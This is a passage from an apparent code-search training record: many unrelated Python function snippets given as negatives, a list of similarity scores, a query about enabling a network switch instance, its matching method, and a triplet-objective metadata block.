mapping that associates micro tree encoding with its corresponding table.\n self._micro_tables = {}\n\n # A mapping that stores the encoding of each micro tree.\n self._codes = {}\n\n # For every micro tree compute a simle table to answer LA queries.\n for p in self._micro_roots:\n code, f, f_inv = self._encode(p) # encode the micro tree\n self._codes[p.index()] = code, f, f_inv\n if code not in self._micro_tables: # build a simple table if needed\n repr_tree = self._decode(code)\n self._micro_tables[code] = LA_table(repr_tree)", "def preinitialisation(ctx, stmt):\n validmap = {\n u\"module\": [OCLintFunctions.check_module_rawtext],\n u\"submodule\": [OCLintFunctions.check_module_rawtext],\n }\n\n for fn in OCLintStages.map_statement_to_lint_fn(stmt, validmap):\n fn(ctx, stmt)", "def create_row_decoder(self):\n \n self.row_decoder_inst = self.add_inst(name=\"row_decoder\", \n mod=self.row_decoder)\n\n temp = []\n for bit in range(self.addr_size):\n temp.append(\"addr_{0}\".format(bit))\n for row in range(self.num_rows):\n temp.append(\"dec_out_{0}\".format(row))\n temp.extend([\"vdd\", \"gnd\"])\n self.connect_inst(temp)", "def _TableSetup(self):\n global _tablesetup\n global singlestarLocation\n if not _tablesetup:\n singlestar.star_setup(singlestarLocation)\n _tablesetup = True", "def initialize(self):\n self.assmts = {}\n\n bit = 1\n for entry in self.entries:\n assmts = AssignmentList()\n assmts.mask = assmts.bit = bit\n self.assmts[entry] = assmts\n bit <<= 1\n\n for block in self.blocks:\n for stat in block.stats:\n if isinstance(stat, NameAssignment):\n stat.bit = bit\n assmts = self.assmts[stat.entry]\n assmts.stats.append(stat)\n assmts.mask |= bit\n bit <<= 1\n\n for block in self.blocks:\n for entry, stat in block.gen.items():\n assmts = self.assmts[entry]\n if stat is Uninitialized:\n block.i_gen |= assmts.bit\n else:\n block.i_gen |= stat.bit\n block.i_kill |= assmts.mask\n block.i_output = block.i_gen\n for entry in block.bounded:\n block.i_kill |= self.assmts[entry].bit\n\n for assmts in self.assmts.values():\n self.entry_point.i_gen |= assmts.bit\n self.entry_point.i_output = self.entry_point.i_gen", "def __init__(self, str):\n super().__init__(str)\n\n # TODO error mng\n self.internal_code = self.parse_def(str)\n self.table_name = 
self.extract_tables(str)\n\n print(self.internal2RustStruct())\n print()\n print(self.internal2RustDieselSchema([\"TODO\", \"TODO2\"]))\n print()", "def makeTableFromRows(tableDef, iterator):\n\tt = TableForDef(tableDef)\n\trmk = rscdef.RowmakerDef.makeTransparentFromTable(tableDef\n\t\t).compileForTableDef(tableDef)\n\tfor row in iterator:\n\t\tt.addRow(rmk(row, t))\n\treturn t", "def setUp(self):\n self.db_handler = DynamoDBHandler(ModelTests.TABLE_NAME)\n self.init_table()\n self.items = {}\n self.init_items()\n self.populate_table()", "def _postprocess_arena(self):\n # Create tables\n for i, (offset, rot, half_size, friction, legs) in enumerate(\n zip(self.table_offsets, self.table_rots, self.table_half_sizes, self.table_frictions, self.has_legs)\n ):\n self._add_table(\n name=f\"table{i}\",\n offset=offset,\n rot=rot,\n half_size=half_size,\n friction=friction,\n has_legs=legs,\n )", "def initialize(self):\n self.assmts = {}\n\n offset = 0\n for entry in self.entries:\n assmts = AssignmentList()\n assmts.bit = 1 << offset\n assmts.mask = assmts.bit\n self.assmts[entry] = assmts\n offset += 1\n\n for block in self.blocks:\n block.stats = block.phis.values() + block.stats\n for stat in block.stats:\n if isinstance(stat, (PhiNode, NameAssignment)):\n stat.bit = 1 << offset\n assmts = self.assmts[stat.entry]\n assmts.stats.append(stat)\n assmts.mask |= stat.bit\n offset += 1\n\n for block in self.blocks:\n for entry, stat in block.gen.items():\n assmts = self.assmts[entry]\n if stat is Uninitialized:\n block.i_gen |= assmts.bit\n else:\n block.i_gen |= stat.bit\n block.i_kill |= assmts.mask\n block.i_output = block.i_gen\n for entry in block.bound:\n block.i_kill |= self.assmts[entry].bit\n\n for assmts in self.assmts.itervalues():\n self.entry_point.i_gen |= assmts.bit\n self.entry_point.i_output = self.entry_point.i_gen", "def __init__(self, lzw_min_code_sz, col_table_sz):\n self.code_table = dict()\n clear_code = 1<<lzw_min_code_sz\n eoi_code = clear_code + 1\n self.code_table[clear_code] = [CLEARCODEVAL]\n self.code_table[eoi_code] = [EOICODEVAL]\n for color in range(col_table_sz):\n self.code_table[color] = [color]", "def createCloudinitDataSpec(self, specName, specDesc):\n print('------create 1 linux cloud-init data CustomizationSpec-------')\n cloudinitConfig = CloudinitConfiguration(metadata=self.metadata,\n userdata=self.userdata)\n cloudConfig =\\\n CloudConfiguration(cloudinit=cloudinitConfig,\n type=CloudConfiguration.Type('CLOUDINIT'))\n configSpec = ConfigurationSpec(cloud_config=cloudConfig)\n globalDnsSettings = GlobalDNSSettings()\n adapterMappingList = []\n customizationSpec =\\\n CustomizationSpec(configuration_spec=configSpec,\n global_dns_settings=globalDnsSettings,\n interfaces=adapterMappingList)\n createSpec = self.specs_svc.CreateSpec(name=specName,\n description=specDesc,\n spec=customizationSpec)\n self.specs_svc.create(spec=createSpec)\n print('{} has been created'.format(specName))\n print('-------------------------------------------------------------')", "def yield_table(\n self, table_name_and_type: Tuple[str, str]\n ) -> Iterable[Optional[CreateTableRequest]]:\n table_name, table_type = table_name_and_type\n schema_name = self.context.database_schema.name.__root__\n db_name = self.context.database.name.__root__\n try:\n\n columns, table_constraints = self.get_columns_and_constraints(\n schema_name=schema_name,\n table_name=table_name,\n db_name=db_name,\n inspector=self.inspector,\n )\n\n view_definition = self.get_view_definition(\n 
table_type=table_type,\n table_name=table_name,\n schema_name=schema_name,\n inspector=self.inspector,\n )\n\n table_request = CreateTableRequest(\n name=table_name,\n tableType=table_type,\n description=self.get_table_description(\n schema_name=schema_name,\n table_name=table_name,\n inspector=self.inspector,\n ),\n columns=columns,\n viewDefinition=view_definition,\n tableConstraints=table_constraints if table_constraints else None,\n databaseSchema=EntityReference(\n id=self.context.database_schema.id,\n type=\"databaseSchema\",\n ),\n tags=self.get_tag_labels(\n table_name=table_name\n ), # Pick tags from context info, if any\n )\n is_partitioned, partition_details = self.get_table_partition_details(\n table_name=table_name, schema_name=schema_name, inspector=self.inspector\n )\n if is_partitioned:\n table_request.tableType = TableType.Partitioned.value\n table_request.tablePartition = partition_details\n\n if table_type == TableType.View or view_definition:\n table_view = TableView.parse_obj(\n {\n \"table_name\": table_name,\n \"schema_name\": schema_name,\n \"db_name\": db_name,\n \"view_definition\": view_definition,\n }\n )\n self.context.table_views.append(table_view)\n\n yield table_request\n self.register_record(table_request=table_request)\n\n except Exception as exc:\n logger.debug(traceback.format_exc())\n logger.warning(f\"Unexpected exception to yield table [{table_name}]: {exc}\")\n self.status.failures.append(f\"{self.config.serviceName}.{table_name}\")", "def _define_tables(self):\n metadata = MetaData(bind=self.engine)\n Base = declarative_base(metadata=metadata)\n\n class Dataset(Base):\n __tablename__ = 'datasets'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(100), nullable=False)\n\n # columns necessary for loading/processing data\n class_column = Column(String(100), nullable=False)\n train_path = Column(String(200), nullable=False)\n test_path = Column(String(200))\n description = Column(String(1000))\n\n # metadata columns, for convenience\n n_examples = Column(Integer, nullable=False)\n k_classes = Column(Integer, nullable=False)\n d_features = Column(Integer, nullable=False)\n majority = Column(Numeric(precision=10, scale=9), nullable=False)\n size_kb = Column(Integer, nullable=False)\n\n def __repr__(self):\n base = \"<%s: %s, %d classes, %d features, %d rows>\"\n return base % (self.name, self.description, self.k_classes,\n self.d_features, self.n_examples)\n\n class Datarun(Base):\n __tablename__ = 'dataruns'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n dataset_id = Column(Integer, ForeignKey('datasets.id'))\n dataset = relationship('Dataset', back_populates='dataruns')\n\n description = Column(String(200), nullable=False)\n priority = Column(Integer)\n\n # hyperparameter selection and tuning settings\n selector = Column(String(200), nullable=False)\n k_window = Column(Integer)\n tuner = Column(String(200), nullable=False)\n gridding = Column(Integer, nullable=False)\n r_minimum = Column(Integer)\n\n # budget settings\n budget_type = Column(Enum(*BUDGET_TYPES))\n budget = Column(Integer)\n deadline = Column(DateTime)\n\n # which metric to use for judgment, and how to compute it\n metric = Column(Enum(*METRICS))\n score_target = Column(Enum(*[s + '_judgment_metric' for s in\n SCORE_TARGETS]))\n\n # variables that store the status of the datarun\n start_time = Column(DateTime)\n end_time = Column(DateTime)\n status = Column(Enum(*DATARUN_STATUS), default=RunStatus.PENDING)\n\n 
def __repr__(self):\n base = \"<ID = %d, dataset ID = %s, strategy = %s, budget = %s (%s), status: %s>\"\n return base % (self.id, self.dataset_id, self.description,\n self.budget_type, self.budget, self.status)\n\n Dataset.dataruns = relationship('Datarun', order_by='Datarun.id',\n back_populates='dataset')\n\n class Hyperpartition(Base):\n __tablename__ = 'hyperpartitions'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n datarun_id = Column(Integer, ForeignKey('dataruns.id'))\n datarun = relationship('Datarun', back_populates='hyperpartitions')\n\n # name of or path to a configured classification method\n method = Column(String(255))\n\n # list of categorical parameters whose values are fixed to define\n # this hyperpartition\n categorical_hyperparameters_64 = Column(Text)\n\n # list of continuous parameters which are not fixed; their values\n # must be selected by a Tuner\n tunable_hyperparameters_64 = Column(Text)\n\n # list of categorical or continuous parameters whose values are\n # always fixed. These do not define the hyperpartition, but their\n # values must be passed on to the method. Here for convenience.\n constant_hyperparameters_64 = Column(Text)\n\n # has the partition had too many errors, or is gridding done?\n status = Column(Enum(*PARTITION_STATUS),\n default=PartitionStatus.INCOMPLETE)\n\n @property\n def categoricals(self):\n \"\"\"\n A list of categorical variables along with the fixed values\n which define this hyperpartition.\n Each element is a ('name', HyperParameter) tuple.\n \"\"\"\n return base_64_to_object(self.categorical_hyperparameters_64)\n\n @categoricals.setter\n def categoricals(self, value):\n self.categorical_hyperparameters_64 = object_to_base_64(value)\n\n @property\n def tunables(self):\n \"\"\"\n A list of parameters which are unspecified and must be selected\n with a Tuner. 
Each element is a ('name', HyperParameter) tuple.\n \"\"\"\n return base_64_to_object(self.tunable_hyperparameters_64)\n\n @tunables.setter\n def tunables(self, value):\n self.tunable_hyperparameters_64 = object_to_base_64(value)\n\n @property\n def constants(self):\n return base_64_to_object(self.constant_hyperparameters_64)\n\n @constants.setter\n def constants(self, value):\n self.constant_hyperparameters_64 = object_to_base_64(value)\n\n def __repr__(self):\n return \"<%s: %s>\" % (self.method, self.categoricals)\n\n Datarun.hyperpartitions = relationship('Hyperpartition',\n order_by='Hyperpartition.id',\n back_populates='datarun')\n\n class Classifier(Base):\n __tablename__ = 'classifiers'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n datarun_id = Column(Integer, ForeignKey('dataruns.id'))\n datarun = relationship('Datarun', back_populates='classifiers')\n hyperpartition_id = Column(Integer, ForeignKey('hyperpartitions.id'))\n hyperpartition = relationship('Hyperpartition',\n back_populates='classifiers')\n\n # name of the host where the model was trained\n host = Column(String(50))\n\n # these columns point to where the output is stored\n model_location = Column(String(300))\n metrics_location = Column(String(300))\n\n # base 64 encoding of the hyperparameter names and values\n hyperparameter_values_64 = Column(Text, nullable=False)\n\n # performance metrics\n cv_judgment_metric = Column(Numeric(precision=20, scale=10))\n cv_judgment_metric_stdev = Column(Numeric(precision=20, scale=10))\n test_judgment_metric = Column(Numeric(precision=20, scale=10))\n\n start_time = Column(DateTime)\n end_time = Column(DateTime)\n status = Column(Enum(*CLASSIFIER_STATUS), nullable=False)\n error_message = Column(Text)\n\n @property\n def hyperparameter_values(self):\n return base_64_to_object(self.hyperparameter_values_64)\n\n @hyperparameter_values.setter\n def hyperparameter_values(self, value):\n self.hyperparameter_values_64 = object_to_base_64(value)\n\n @property\n def mu_sigma_judgment_metric(self):\n # compute the lower confidence bound on the cross-validated\n # judgment metric\n if self.cv_judgment_metric is None:\n return None\n return (self.cv_judgment_metric - 2 *\n self.cv_judgment_metric_stdev)\n\n def __repr__(self):\n params = ', '.join(['%s: %s' % i for i in\n list(self.hyperparameter_values.items())])\n return \"<id=%d, params=(%s)>\" % (self.id, params)\n\n Datarun.classifiers = relationship('Classifier',\n order_by='Classifier.id',\n back_populates='datarun')\n Hyperpartition.classifiers = relationship('Classifier',\n order_by='Classifier.id',\n back_populates='hyperpartition')\n\n self.Dataset = Dataset\n self.Datarun = Datarun\n self.Hyperpartition = Hyperpartition\n self.Classifier = Classifier\n\n Base.metadata.create_all(bind=self.engine)", "def setup_table_for_epochs(table, timeseries, tag):\n table = table.copy()\n indices = np.searchsorted(timeseries.timestamps[:], table['start_time'].values)\n if len(indices > 0):\n diffs = np.concatenate([np.diff(indices), [table.shape[0] - indices[-1]]])\n else:\n diffs = []\n\n table['tags'] = [(tag,)] * table.shape[0]\n table['timeseries'] = [[[indices[ii], diffs[ii], timeseries]] for ii in range(table.shape[0])]\n return table", "def install(cls):\n\n\t\t# Go through each Record type\n\t\tfor o in cls._install:\n\n\t\t\t# Install the table\n\t\t\tif not o.table_create():\n\t\t\t\tprint(\"Failed to create `%s` table\" % o.tableName())", "def initialize_tables(database_connection_object, 
logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)", "def post_interface_route_table_create(self, resource_dict):\n pass", "def add_tables(self, *tables):\n \n for t in tables:\n # if table contains actual aperture magnitudes\n if \"mag_calib_unc\" in t.colnames:\n LightCurve.__mag_table_append(self, t.copy())\n # if table contains limiting magnitudes\n else: \n LightCurve.__limmag_table_append(self, t.copy())", "def __init__(self, *args, **kwargs):\n SpecMessage.__init__(self, '<IiiiIIiiIII80s')\n\n if len(args) > 0:\n self.init(*args, **kwargs)", "def extract_table_byte_table(first_line_idx, lineIN_list): \n DEBUG_byte_table = False\n if DEBUG_byte_table: header = '>>>DEBUG_byte_table:\\t'\n if DEBUG_byte_table: print header, 'first_line_idx', first_line_idx \n if DEBUG_byte_table: from pprint import pprint as pp\n my_lineOUT_list = []\n my_lineIN_list = []\n\n #OBS header_of_the_table = 'Bytes'\n cell0_without_tab_list = [\n ['17', '105-'],\n ['18', '111-'],\n ['19', '131-'],\n ['19', '148-'],\n ['19', '165-'],\n ['19', '168-'],\n ['19', '184-'],\n ['19', '186-'],\n ['19', '188-'],\n ['19', '193-'],\n ['19', '196-'],\n ['19', '212-'],\n ['19', '224-'],\n ['34', '128-'],\n ['34', '130-'],\n ['34', '132-'],\n ['34', '134-'],\n ['34', '136-'],\n ['34', '144-'],\n ['34', '146-'],\n ['34', '148-'],\n ['34', '150-'],\n ['34', '152-'],\n ['34', '160-'],\n ['34', '176-'],\n ['34', '178-'],\n ['34', '180-'],\n ['34', '182-'],\n ['34', '184-'],\n ['34', '186-'],\n ['34', '188-'],\n ['34', '190-'],\n ['34', '192-'],\n ['34', '194-'],\n ['34', '196-'],\n ['34', '198-'],\n ['34', '200-'],\n ['34', '208-'],\n ]\n tab_within_cell_list = [\n ] \n merged_cell_list = [\n # text in this cell is merged cells\n '\\tSee Table',\n '\\t-',\n ] \n #unwanted_line_list = [\n #['19', 'Base ID fields'],\n #['19', 'Extended ID fields'],\n #['19', 'Vendor Specific ID fields'],\n #]\n #ignore_blank_line = [\n # '13',\n #]\n\n \n DEBUG0 = False\n if DEBUG0: header0 = '>>>DEBUG0:\\t'\n if DEBUG0: \n start_line = 1720\n end_line = start_line + 100\n for line_idx in range(start_line, end_line+10):\n #for line_idx in range(len(new_lineIN_list)):\n print header0, '>>>>>>>>>>>>>>', '%d(%s)'%(line_idx, lineIN_list[line_idx].rstrip())\n #if new_lineIN_list[line_idx].startswith('255\\t'):\n # break\n\n DEBUG1 = False\n if DEBUG1: header1 = '>>>DEBUG1:\\t'\n\n for line_idx in range(first_line_idx+1, len(lineIN_list) ):\n\n #this_line = lineIN_list[line_idx]\n #if DEBUG1: print header1, 1000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n #this_line = lineIN_list[line_idx].replace('\\n', '') # strip EOL only, not other whtite space\n #if DEBUG1: print header1, 1002, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n this_line = lineIN_list[line_idx].rstrip('\\n') # strip EOL only, not other whtite space\n #if DEBUG1: print header1, 1004, 'line_idx(%d). 
(this_line)(%s)'%(line_idx, this_line)\n\n if DEBUG1: print header1, 1000, 'This table: len(my_lineIN_list)(%d)'%(len(my_lineIN_list))\n\n # Fix unwantted tab in original PDF file: replace unwanted tab into a space\n for tmp_str in tab_within_cell_list:\n if DEBUG1: print header1, 1500, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n this_line = this_line.replace('%s\\t'%(tmp_str), '%s '%(tmp_str), 1)\n\n if len(this_line) != 0:\n #if re.search('^ *$', this_line): # look for zero or more space, but do not touch the tab\n if DEBUG1: print header1, 2000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n try:\n header_of_the_table \n if DEBUG1: print header1, 2100, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n except NameError:\n header_of_the_table = re.sub('\\t.*', '', this_line) # extract only the first cell\n if DEBUG1: print header1, 2200, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n # Ignore unwanted line within a table\n #for this_table, this_value in unwanted_line_list:\n # if this_table in lineIN_list[first_line_idx] and this_value in this_line:\n # if DEBUG_byte_table: print header, 'SKIPPED %3d: 2000, this_line\\t(%s)'%(line_idx, this_line)\n # pass\n # else:\n # my_lineIN_list.append(this_line)\n my_lineIN_list.append(this_line)\n else:\n # The table itself is between 2 blank lines, except TABLE 13\n #if any(this_table in lineIN_list[first_line_idx] for this_table in ignore_blank_line):\n # if '13' in lineIN_list[first_line_idx]:\n # my_lineIN_list.append('\\t') # line for bit 0 has a missing trailing tab\n # pass\n\n # The table itself is between 2 blank lines\n if DEBUG1: print header1, 6000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n if len(my_lineIN_list) != 0:\n if DEBUG1: print header1, 6400, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n break\n if DEBUG1: print header1, 6600, 'line_idx(%d). 
(this_line)(%s)'%(line_idx, this_line)\n\n DEBUG2 = False\n if DEBUG2: header2 = '>>>DEBUG2:\\t'\n if DEBUG2: \n print header2, 'This table: len(my_lineIN_list)(%d)'%(len(my_lineIN_list))\n for line_idx in range(len(my_lineIN_list)):\n print header2, 'my_lineIN_list[%d](%s):'%(line_idx, my_lineIN_list[line_idx])\n\n # Make the text line compatible with CSV syntax\n line_idx = 0\n while line_idx < len(my_lineIN_list):\n this_line = my_lineIN_list[line_idx]\n this_delimiter_count = this_line.count('\\t')\n\n if DEBUG_byte_table: print\n if DEBUG_byte_table: print header, '%3d: 2000, this_line\\t(%s)'%(line_idx, this_line)\n\n if this_line.startswith(header_of_the_table):\n #if DEBUG_byte_table: print header, '%3d: 2010, this_line\\t(%s)'%(line_idx, this_line)\n # header of the table\n delimiter_count = this_delimiter_count\n this_line = text_to_csv_syntax(this_line) # text line compatible with CSV syntax\n this_line = text_to_excessive_space_on_hyphen(this_line) # remove the space in 'xx- xx', or 'xx -xx'\n my_lineOUT_list.append(this_line)\n\n else:\n #if DEBUG_byte_table: print header, '%3d: 2020, this_line\\t(%s)'%(line_idx, this_line)\n # Get one or more line until enough cells: \n while this_line.count('\\t') < delimiter_count:\n # append next line\n if line_idx+1 < len(my_lineIN_list):\n if DEBUG_byte_table: print header, '%3d: 2035, my_lineIN_list[line_idx+1]\\t(%s)'%(line_idx, my_lineIN_list[line_idx+1])\n #if any(my_lineIN_list[line_idx+1].startswith(z) for z in (merged_cell_list)):\n if any(z in my_lineIN_list[line_idx] for z in (merged_cell_list)):\n if DEBUG_byte_table: print header, '%3d: 2040, this_line\\t(%s)'%(line_idx, this_line)\n break # Done because a line with merged cell has less total number of cells \n line_idx += 1\n this_line += ' ' + my_lineIN_list[line_idx]\n\n if DEBUG_byte_table: print header, '%3d: 3000, this_line\\t(%s)'%(line_idx, this_line)\n else:\n break\n\n # Has enough cells: append one or more line if these line has no tab except \n # the line start with a specific text\n while line_idx+1 < len(my_lineIN_list) and not '\\t' in my_lineIN_list[line_idx+1]:\n #if any (my_lineIN_list[line_idx+1].startswith(z) for tbl, z in cell0_without_tab_list):\n\n DEBUG_4 = False\n if DEBUG_4: header = '>>>DEBUG_4:\\t'\n if DEBUG_4:\n pass\n #if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n #print header, cell0_without_tab_list\n print header, cell0_without_tab_list\n #print header, for this_table, z in cell0_without_tab_list):\n #print header, if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n for this_table, z in cell0_without_tab_list:\n print header, 'this_table(%r), z(%r), lineIN_list[first_line_idx](%r), my_lineIN_list[line_idx+1](%r)'%(this_table, z, lineIN_list[first_line_idx], my_lineIN_list[line_idx+1]),\n print this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z)\n\n\n if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n break\n else:\n line_idx += 1\n this_line += ' ' + my_lineIN_list[line_idx]\n if DEBUG_byte_table: print header, '%3d: 4020, this_line\\t(%s)'%(line_idx, this_line)\n if DEBUG_byte_table: print header, '%3d: 4030, text appended\\t(%s)'%(line_idx, my_lineIN_list[line_idx])\n\n this_line = text_to_csv_syntax(this_line) # text line 
compatible with CSV syntax\n this_line = text_to_excessive_space_on_hyphen(this_line) # remove the space in 'xx- xx', or 'xx -xx'\n my_lineOUT_list.append(this_line)\n if DEBUG_byte_table: print header, '%3d: 9999, my_lineOUT_list[-1]\\t(%s)'%(line_idx, my_lineOUT_list[-1])\n line_idx += 1\n\n if DEBUG_byte_table:\n for str2 in my_lineOUT_list: print header, 'str2(%r)'%(str2)\n return my_lineOUT_list", "def __init__(self, schema_row):\n self.schema = []\n for field in schema_row['fields']:\n self.schema.append(field['type'])", "def start_table(self):\n self.col_widths = []\n self.result = \"\"" ]
[ "0.52702624", "0.51661", "0.51060444", "0.5094332", "0.50876445", "0.50695586", "0.50232565", "0.49792466", "0.49553454", "0.49386698", "0.49274278", "0.49077904", "0.4889465", "0.48876804", "0.48618603", "0.48576298", "0.48565733", "0.48539078", "0.4839813", "0.48349887", "0.48339733", "0.48286325", "0.48004246", "0.47759512", "0.47651866", "0.47467768", "0.4742607", "0.47310084", "0.46929148", "0.468556", "0.46852288", "0.4683481", "0.46700856", "0.465237", "0.46491137", "0.46291593", "0.46266803", "0.46239597", "0.46189338", "0.46158814", "0.46156737", "0.46028277", "0.45988107", "0.45983928", "0.45937237", "0.45629358", "0.45588264", "0.4553068", "0.45518714", "0.45516944", "0.4536049", "0.4534412", "0.45334524", "0.45324546", "0.4527784", "0.4527784", "0.45183995", "0.4501756", "0.44962424", "0.44898555", "0.4483053", "0.4481861", "0.44728413", "0.44727623", "0.4468818", "0.44684574", "0.4464714", "0.44475922", "0.44460234", "0.44440016", "0.4443378", "0.44417518", "0.44384107", "0.44353884", "0.44351754", "0.44349846", "0.44304538", "0.442999", "0.44266653", "0.4417068", "0.44142175", "0.44136557", "0.44060728", "0.44053015", "0.4402293", "0.44013962", "0.43992466", "0.43978137", "0.43925777", "0.43917558", "0.43892244", "0.43847278", "0.43807763", "0.43794182", "0.43786326", "0.43778607", "0.43774024", "0.4374664", "0.43717965", "0.4357933" ]
0.7456325
0
Enable the switch instance. Start the traffic manager threads and allow packets to enter the processor chain.
def enable(self): if not self.tm_started: for name, tm in self.air_traffic_manager.items(): logging.debug("Starting tm %s" % name) tm.start() self.tm_started = True logging.debug("Enabling switch %s" % self.name) self.disabled = False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def enable(self):\n self.switch.enable()\n self._enabled = True", "def start_sending_to_switch(self):\n self.switch_active = True\n for message in self.internal_switch_buffer:\n self.switch.buffer.append(message)\n self.internal_switch_buffer = []", "def launch ():\n def start_switch (event):\n log.info(\"switch %s has come up\" % event.dpid)\n log.info(event.connection.ports)\n sw = switches_by_dpid.get(event.dpid)\n\n if sw is None:\n # New switch\n sw = TopoSwitch(event.connection)\n switches_by_dpid[event.dpid] = sw\n sw.connect(event.connection)\n else:\n sw.connect(event.connection)\n core.openflow.addListenerByName(\"ConnectionUp\", start_switch)", "def connect_to_switches(self):\n for p4switch in self.topo.get_p4switches():\n thrift_port = self.topo.get_thrift_port(p4switch)\n self.controllers[p4switch] = SimpleSwitchThriftAPI(thrift_port)", "def _enable(self):\n sub = multiprocessing.Process(target=subproc)\n sub.start()", "def enable(self):\n self.fisica.open()\n self.rx.threadStart()\n self.tx.threadStart()", "def start():\n Networker.stop()\n Networker.Instance = Networker()", "def _start(self):\n\n super(PySwitchLibApiDaemonRunner, self)._start()", "def enable_relays(self):\n #ensure clock and data are low\n self.e.clear_bit(7)\n self.e.clear_bit(5)\n time.sleep(0.01)\n\n #pulse the clock line\n self.e.set_bit(7)\n time.sleep(0.01)\n self.e.clear_bit(7)", "def _init_threads(self):\n\n startTh = Thread(name='InitialStart', target = self._singleUpdate, args=(self.outPs, ))\n self.threads.append(startTh)\n\n sendTh = Thread(name='SteeringListen',target = self._listen_for_steering, args = (self.inPs[0], self.outPs, ))\n self.threads.append(sendTh)", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "def on_pre_enter(self):\n self.setup()\n self.start()", "def start(self):\n if self._start_event is None:\n _call_spawn_callbacks(self)\n hub = get_my_hub(self) # pylint:disable=undefined-variable\n self._start_event = hub.loop.run_callback(self.switch)", "def start_controller(self, controller):\n srv = SwitchControllerRequest()\n srv.start_controllers = [controller]\n srv.strictness = SwitchControllerRequest.BEST_EFFORT\n self.switch_controller(srv)", "def force_switch_on(self):\n self.turn_on_modem()", "def startManager(self):\n\t\tlogging.info(\"----->>>The DeviceDataManager will be started\")\n\t\tself.sysPerfManager.startManager()\n\t\tself.sensorAdapterManager.startManager()\n\t\tif self.enableRedis:\n\t\t\tself.redisClient.connectClient()\n\t\t\n\t\tif self.enableMqtt:\n\t\t\tself.mqttClient.connectClient()", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)", "def server_activate(self):\n\t\tpass", "def activate(self):\n self.start()", "def start_traffic(self):\n raise NotImplementedError", "def turn_on(self, **kwargs):\n if not self.is_on:\n _LOGGER.debug(\"Sending START command to: %s\", self._name)\n 
self._api.control('START')\n self._mower_status = STATUS_EXECUTING_START\n self.schedule_update_ha_state()", "def start(self):\n def f():\n if (self.started): return\n self.started = True\n with client.ServerProxy(self.host) as proxy:\n while (not self.req_shutdown):\n self.update_speed(proxy)\n time.sleep(self.com_freq)\n self.started = False\n self.req_shutdwon = False\n\n Thread(target=f).start()", "def start():\n global logger\n global client\n global config\n global device\n global circles_config\n global circles\n global mac2circle\n logger = LoggerClient.open(\"PlugwiseMonitor\")\n if not verbose: logger.config(logger.levels.WARNING, logger.schedules.DAILY)\n config = Utils.getconfig(\"plugwise\", logger)\n assert config is not None\n device = plugwise_api.Stick(logger, DEFAULT_SERIAL_PORT)\n\n # circles_config is a list of dictionaries: name, mac, desc. state field is\n # added in next loop to track its value so it can be used to only send\n # messages in state transitions. power1s and power8s field is used to check\n # the relative difference in power in order to reduce the network overhead.\n circles_config = config[\"circles\"]\n circles = []\n mac2circle = {}\n for circle_data in circles_config:\n mac = circle_data[\"mac\"]\n circles.append( plugwise_api.Circle(logger, mac, device, {\n \"name\" : circle_data[\"name\"],\n \"location\" : circle_data[\"desc\"],\n \"always_on\" : \"False\",\n \"production\" : \"True\"\n }) )\n mac2circle[mac] = circles[-1]\n circle_data[\"state\"] = \"NA\"\n for v in OUTPUT_LIST:\n circle_data[\"power\" + v[\"suffix\"]] = -10000.0\n circle_data[\"when\" + v[\"suffix\"]] = 0.0\n \n client = Utils.getpahoclient(logger, __configure)\n client.loop_start()", "def start(self):\n self.active = True", "def init(self):\n logger.info(\"Turn on antenna power\")\n logger.info(\"Register on the network\")\n self.emit('provider-modified', \"Charlie Telecom\")\n self.network_strength = 100\n yield tichy.Service.get('ConfigService').wait_initialized()\n self.config_service = tichy.Service.get(\"ConfigService\")\n logger.info(\"got config service\")\n self.values = self.config_service.get_items(\"call_forwarding\")\n if self.values != None: self.values = dict(self.values)\n logger.info(\"realized values is none\")\n self.SettingReason = tichy.settings.ListSetting('Call Forwarding', 'Reason', tichy.Text, value='unconditional', setter=self.ForwardingSetReason, options=[\"unconditional\",\"mobile busy\",\"no reply\",\"not reachable\",\"all\",\"all conditional\"], model=tichy.List([ListSettingObject(\"unconditional\", self.action),ListSettingObject(\"mobile busy\", self.action),ListSettingObject(\"no reply\", self.action),ListSettingObject(\"not reachable\", self.action),ListSettingObject(\"all\", self.action),ListSettingObject(\"all conditional\", self.action)]), ListLabel = [('title','name')])\n self.SettingChannels = tichy.settings.Setting('Call Forwarding', 'channels', tichy.Text, value=self.ForwardingGet('class'), 